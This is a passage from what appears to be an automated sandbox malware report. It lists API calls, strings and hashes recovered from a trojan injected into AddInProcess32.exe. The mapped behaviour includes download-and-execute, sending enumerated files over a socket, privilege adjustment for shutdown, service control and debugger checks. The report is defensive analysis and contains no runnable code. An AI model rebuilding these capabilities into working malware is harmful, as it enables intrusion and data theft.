                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                        • String ID:
                                                                                                        • API String ID: 276877138-0
                                                                                                        • Opcode ID: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
                                                                                                        • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                                                                        • Opcode Fuzzy Hash: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
                                                                                                        • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                                                                        Function 004158B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                          • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                          • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                          • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                          • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                        • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                        • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                        • String ID: PowrProf.dll$SetSuspendState
                                                                                                        • API String ID: 1589313981-1420736420
                                                                                                        • Opcode ID: 7adedae087191cdbb87074b96bc09b469b6d5cbd4a3edd008392af3fdf127515
                                                                                                        • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                                                                        • Opcode Fuzzy Hash: 7adedae087191cdbb87074b96bc09b469b6d5cbd4a3edd008392af3fdf127515
                                                                                                        • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                                                        Function 004511E3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
                                                                                                        • GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID: ACP$OCP
                                                                                                        • API String ID: 2299586839-711371036
                                                                                                        • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                        • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                                                                        • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                        • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                                                                        Function 0041A63F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                                                                        • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                                                        • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                                                        • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                                        • String ID: SETTINGS
                                                                                                        • API String ID: 3473537107-594951305
                                                                                                        • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                        • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                                                                        • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                        • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                                                                        Function 00407A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Find$File$CloseFirstH_prologNext
                                                                                                        • String ID:
                                                                                                        • API String ID: 1157919129-0
                                                                                                        • Opcode ID: 6a2d412744edee45f0d860d0441e360fba5e5849462073823f699ecb6cc56ff2
                                                                                                        • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                                                                        • Opcode Fuzzy Hash: 6a2d412744edee45f0d860d0441e360fba5e5849462073823f699ecb6cc56ff2
                                                                                                        • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                                                                        Function 0044800F Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                                        • _free.LIBCMT ref: 00448067
                                                                                                          • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                          • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                        • _free.LIBCMT ref: 00448233
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                        • String ID:
                                                                                                        • API String ID: 1286116820-0
                                                                                                        • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                        • Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
                                                                                                        • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                        • Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58
                                                                                                        Function 00406128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DownloadExecuteFileShell
                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$open
                                                                                                        • API String ID: 2825088817-2881483049
                                                                                                        • Opcode ID: 987d970d9b7ebc5844ce0f49172f527790acb3a99b69c5f6248a1dc45aa8f3ed
                                                                                                        • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                                                                        • Opcode Fuzzy Hash: 987d970d9b7ebc5844ce0f49172f527790acb3a99b69c5f6248a1dc45aa8f3ed
                                                                                                        • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                                                                        Function 00406AC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileFind$FirstNextsend
                                                                                                        • String ID: x@G$x@G
                                                                                                        • API String ID: 4113138495-3390264752
                                                                                                        • Opcode ID: 9e42d4624aa1081e31404d699729e015607263420c2313147d1fc57e1445648b
                                                                                                        • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                                                                        • Opcode Fuzzy Hash: 9e42d4624aa1081e31404d699729e015607263420c2313147d1fc57e1445648b
                                                                                                        • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                                        Function 0041BB77 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                          • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                          • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                          • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateInfoParametersSystemValue
                                                                                                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                        • API String ID: 4127273184-3576401099
                                                                                                        • Opcode ID: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                                                        • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                                                                        • Opcode Fuzzy Hash: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                                                        • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                                                                        Function 00450A7F Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
                                                                                                        • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                                                                        • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 4212172061-0
                                                                                                        • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                        • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                                                                        • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                        • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                                                                        Function 00408DA7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileFind$FirstH_prologNext
                                                                                                        • String ID:
                                                                                                        • API String ID: 301083792-0
                                                                                                        • Opcode ID: 0b43960f9993051d9431381d87604967d53f88331668a9e606d8c6ddd84d18a2
                                                                                                        • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                                                                        • Opcode Fuzzy Hash: 0b43960f9993051d9431381d87604967d53f88331668a9e606d8c6ddd84d18a2
                                                                                                        • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                                                                        Function 00450E6A Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                        • String ID:
                                                                                                        • API String ID: 2829624132-0
                                                                                                        • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                        • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                                                                        • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                        • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                                                                        Function 0043A65D Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 0043A755
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 0043A75F
                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 0043A76C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                        • String ID:
                                                                                                        • API String ID: 3906539128-0
                                                                                                        • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                        • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                                                                        • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                        • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                                                                        Function 00442554 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 00442575
                                                                                                        • TerminateProcess.KERNEL32(00000000,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044257C
                                                                                                        • ExitProcess.KERNEL32 ref: 0044258E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                        • String ID:
                                                                                                        • API String ID: 1703294689-0
                                                                                                        • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                        • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                                                                        • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                        • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                                                                        Function 0044D5E9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .
                                                                                                        • API String ID: 0-248832578
                                                                                                        • Opcode ID: abd6fd6b538380b102c55790d6b56a2ac58ff5115e1efa51d285ee8eb71cff1a
                                                                                                        • Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
                                                                                                        • Opcode Fuzzy Hash: abd6fd6b538380b102c55790d6b56a2ac58ff5115e1efa51d285ee8eb71cff1a
                                                                                                        • Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
                                                                                                        Function 00450D42 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                        • EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                        • String ID: <D
                                                                                                        • API String ID: 1084509184-3866323178
                                                                                                        • Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                                                                        • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                                                                        • Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                                                                        • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                                                                        Function 00450DDD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                          • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                        • EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                        • String ID: <D
                                                                                                        • API String ID: 1084509184-3866323178
                                                                                                        • Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                                        • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                                                                        • Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                                        • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                                                                        Function 00447597 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID: GetLocaleInfoEx
                                                                                                        • API String ID: 2299586839-2904428671
                                                                                                        • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                        • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                                                                        • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                        • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                                                                        Function 004510BA Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                          • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                          • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
